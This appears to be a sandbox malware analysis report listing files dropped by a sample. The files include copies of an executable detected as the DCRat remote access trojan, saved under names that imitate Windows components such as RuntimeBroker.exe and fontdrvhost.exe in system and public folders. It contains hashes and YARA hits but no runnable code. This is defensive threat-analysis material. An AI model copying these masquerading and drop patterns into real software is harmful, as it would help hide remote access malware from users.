                              C:\Program Files\Windows NT\TableTextService\en-US\5b884080fd4f94

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (790), with no line terminators
                              Category:dropped
                              Size (bytes):790
                              Entropy (8bit):5.894070668899163
                              Encrypted:false
                              SSDEEP:12:64MWc/DzGc1bsDSR9dZ1TPAwEz+5MsjU+928+lglUMih5Xw4YiGb26yt:645Kqc1b3RTZKwEz+2HsIWa5XdYLyt
                              MD5:6D633AE1236DAEE651631F433FA224B5
                              SHA1:5E60B83A64CE7FCC0E8EBA89784E2695826D765C
                              SHA-256:4ED968418B0F486C220D755FFDF9BA43544BD70BA7B49F65E050C1DC278E78F0
                              SHA-512:8127C4483C162CC75066EFD0362B303AB028ADCB97A0F9741DB507A5EE86A96594A712876FB59EA6F6F25C750BD892154D1A7348AA4868659A0B1B8147CBD370
                              Malicious:false
                              Preview:gL9KRVr9BF389p62InhrPXXuGBe2qvgd2TXyegA1ttzdtDurTKbGGohIxOEP1yTPiaGqRIYmnp8gh4BCQwjfUaWNvPBPcuA4Zk5S6EZLwzcbqBk3NB8EPy5IE35CHIJ2pEG78sGMWXsf75htpHCaw5olpwODIXEopkvm4m4f5vr1FZKIVLX9GtFuZfSLdDE9TE0XJ5zCNgfANwgPmFr6AEh6eBMZUsB2rsiAjx9aWUvjNFgn9CjYVH8Og42IsZsffnTfOfqyGQkpT8sZejaSImgjtTdp50r6mQDkvBYdVuSEgS5iMcoJ9aW2Gtv5CB3PinDD4HndK66YUbCaX5ccMi7M3KeCPdbU0Cg3P1nEzK9Cd8ipqUhGibDAq1KunlNrflhS5JLfSYnBj4s4myV45UwZ8fMXr3bN7Rg2bPtgJByKyCbvJPHyQSvKzIUZ7xyZ6ZDRXzdXEyv4glk6EaOcvn7ogWDT5UjVNZNY8KYTvutbh0oNhYVgjVnScYuBwKbuPZrHXM74C4qB3fHprzwh8Cw1v55jZWglS8MHJhzUabeoomZ7RET7Y4vMmzVcQYepYFs5TAgK9bGhiIMJg8SUCjNYN9fULWEB6yQj3enRiJ76xOoemM6RGJmy2UrUfL9mXFkt2nQCVBw3mQk8UBs9aw5wMbriwTwWJUjsn5l8646FXtMltt9ddAMlJyha6rPCOZtRr2VZZtCfz0ZdPFyDTS3JH8jzXKCPo4079441XjEt7rvSYEL02Ms6gkJtSgBPrx04AbeUL7ptNJLaMQaT8L

                              C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 79%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................~.... ... ....@.. .......................`.......^....@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H.......H...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                              C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

                              C:\Recovery\7bcc3440f42388

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (578), with no line terminators
                              Category:dropped
                              Size (bytes):578
                              Entropy (8bit):5.878655502068084
                              Encrypted:false
                              SSDEEP:12:ZXfLWXKlHP/vIS9jsRMSQaDRzn5tLUPc3sEb/hWcwjh4GGTJ:ZIsHIRrQa1z5tLz9/hcjiHTJ
                              MD5:2E200C0EA6ED7021327CBEE4DB4927AC
                              SHA1:258FDD3ECA1C01AF78260974791B30DBB043DB6F
                              SHA-256:6692C38BCEA07EF209920184AE92C04BF6E52CB7C440CE30A83065349CEC2701
                              SHA-512:69BE5274B3CE3A811CB59D7E3DF00EC7D50913F1F193BA6D96CBBBC14916FDC2F1AC3ECACCC1E23CE0CDA6E724AC2B03E479E995AD02F299CB3216AA53F7776F
                              Malicious:false
                              Preview:K3AYW4yU8ouL8AQ4HAJVK42WMtHMtZ5zi05ysdEiJg48dFHO8YUd5CZQBoMnxlkjs4nHEbLo6lMn932Hm2OVFc4fbpxEQbuh5VPjc9JgMphU0vQHvEB5XPdQAHqZoGXf0osonTomssIZ4jppYpTLazKq19jUSu1GSCdLDmdcaYMpGEVacBB9xLFBeBwotUU80CG2GdmvL0vBnfjwnI2Rt2SH6crB0zsGEOyE8cT8YPx7ZDY8c9AkbCO7t96ovl5WHp7ZqeyKz32dFVr3Eti0yHoB91V8gpMxUaztG9R8KzvhKu2YRDkCCEhAB6ZzJzoJrFJog8wFbkq8VG0O87rdFJuP2ysJjbyULm0ElN1TQflcYjo4FL1MIKEhV3wrPmg9vVxtQvmvFYNkiR1TKyEXkmMAiStrbKDn8lqCv4nTiFGt7d9DCcgaiIYJIxL7C5U5Ukl6lyhPKvyffdCETqo9nmE0Mh48tqRnvLYX2DbO4QQxU3npuGnVQVRrfvtE4jgeeLtTEpMQOaEWWRfT3OOmC5Wa4q2GTXUVuvTJKTkF4XH0Q4UNPaKpV3ciySZYwF60Gt

                              C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 79%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................~.... ... ....@.. .......................`.......^....@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H.......H...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                              C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

                              C:\Users\Default\9e8d7a4ca61bd9

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):291
                              Entropy (8bit):5.81117666909219
                              Encrypted:false
                              SSDEEP:6:Iwc5vUgS1WDKWLsk1oQmj/Dvy5+dcsF1Iw7Ps6N63bln:65GW+WLsGoRdhIub6rln
                              MD5:C511A5E07A4AF85A2A87807FEBB4025C
                              SHA1:2C32D54C0D3811395AB8813BCE4DC8C1AB06C3E4
                              SHA-256:DFAB062223D02BD3F2E79F7758D636F113ACA07F0CA9CB87CB63E2715E8A7FC7
                              SHA-512:CF94E134866D33827F2DFEB59F88D3FC5927DE5CBA5B73B9869A5876D67CEA97F1D7EEB59AA9507F333C3634222B569291232372F1E88E04AA8986B217F90869
                              Malicious:false
                              Preview:cVLIYNPldWC0Eo94GV9EvXbmonTp57qCRpSeH7t3hFMMqPkm4gtQKWfF3jev4kqfp9jYVfwJmGhqKP5ZCquYOa25KNlic886ZrgqqLRZukoEzz4nnFsNzRQPHnOH3NqoHkQdtOs1ZVoowxGUS85XQvGIaRiC7Jfg4A7Oib3YW1xemmdTh4z5SSYWdICcpq3QzIuw01v0EgBY7mfxyOfDUkNlmluaYbtq7hoe2qdqI80wQ9Y1mPnaL06P4IKPGVbmxVbZ8B4Hvz4VtbUmM3yJySfGkZjugNjxgO8

                              C:\Users\Default\RuntimeBroker.exe

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\RuntimeBroker.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Default\RuntimeBroker.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Users\Default\RuntimeBroker.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 79%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................~.... ... ....@.. .......................`.......^....@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H.......H...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                              C:\Users\Default\RuntimeBroker.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

                              C:\Users\Public\Libraries\9e8d7a4ca61bd9

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (508), with no line terminators
                              Category:dropped
                              Size (bytes):508
                              Entropy (8bit):5.865134715345217
                              Encrypted:false
                              SSDEEP:12:9wq5qKz7AaAut8G/I0JDBGX7enGCt2ArkUmYXxBd:9weZz7Kut82xTrkiXxj
                              MD5:5474CF40BEFCD497AB573147FD89405F
                              SHA1:5B87C068A2273E46F884BEF37C81B958FFA557F2
                              SHA-256:F5EBBC1CD6F22392C6E822EBA3B84126814C4A0C3C3A26DF4467FEC63204A551
                              SHA-512:BDAE942037FF1C9B6DC8E0708FF96539D7E26ED322BB3ACBF665FB4DCA5AAA3F386B9922E23AE6916EA4A29DFDE6195D9D5BF57FB1C979487E3660D2B355FDB6
                              Malicious:false
                              Preview:cxhDMhSye0UzibKkhPHyfcZENBNzRnJK94H69KWPOZeFNJUIJ6HGyw99YczLTdh1rKzoUOkW21kF8T1DqEpUfCWN4HihVL6v2mYDUqy5WuN6L4BEkwePxMVoxltNqDBr5zMW5ysAQt8uyZCAGd6iqr7qQuPt6lPStgAWrpJwDe8DNlzXjtHMGcAO1gFLi9EoeqBRZpSaTJfMs4cp41JMeCMRfwfKj8NEaUjhjh84aq367yf6DZQr01KbduwmKI1U6bwYV5FW2PwxJPTrQiHJrgOiJHDzvWtSyiAfCHlHT4ykEXSOaFVlArnaNNOO2Qkgfe8kOyoI690xrndwyyZqAIRH5kSz2XPDTSFkYr9maMoA1zsjtcZD03fXM1pofzQjtwdZi2YGyxQydQQF1sFa7MMawrYgCVGl6FREWSB0ESODnr45kjwwtzlhjDn0e1Edqo1X9LtirPVo7IwFxd6ciT2GetfSpKWNOvX8zg5ZzNFee6jbQhCA5l4Wwv3Q

                              C:\Users\Public\Libraries\RuntimeBroker.exe

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 79%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................~.... ... ....@.. .......................`.......^....@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H.......H...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                              C:\Users\Public\Libraries\RuntimeBroker.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:false
                              Preview:[ZoneTransfer]....ZoneId=0

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

                              Download File
                              Process:C:\Users\Public\Libraries\RuntimeBroker.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):1281
                              Entropy (8bit):5.370111951859942
                              Encrypted:false
                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                              MD5:12C61586CD59AA6F2A21DF30501F71BD
                              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dmhu7oz5yP.exe.log

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):1740
                              Entropy (8bit):5.36827240602657
                              Encrypted:false
                              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
                              MD5:B28E0CCD25623D173B2EB29F3A99B9DD
                              SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
                              SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
                              SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
                              Malicious:true
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontdrvhost.exe.log

                              Download File
                              Process:C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):1281
                              Entropy (8bit):5.370111951859942
                              Encrypted:false
                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                              MD5:12C61586CD59AA6F2A21DF30501F71BD
                              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jnTUlYyDyuybgXdgxhTkT.exe.log

                              Download File
                              Process:C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):1281
                              Entropy (8bit):5.370111951859942
                              Encrypted:false
                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                              MD5:12C61586CD59AA6F2A21DF30501F71BD
                              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\upfc.exe.log

                              Download File
                              Process:C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):1281
                              Entropy (8bit):5.370111951859942
                              Encrypted:false
                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                              MD5:12C61586CD59AA6F2A21DF30501F71BD
                              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                              Malicious:false
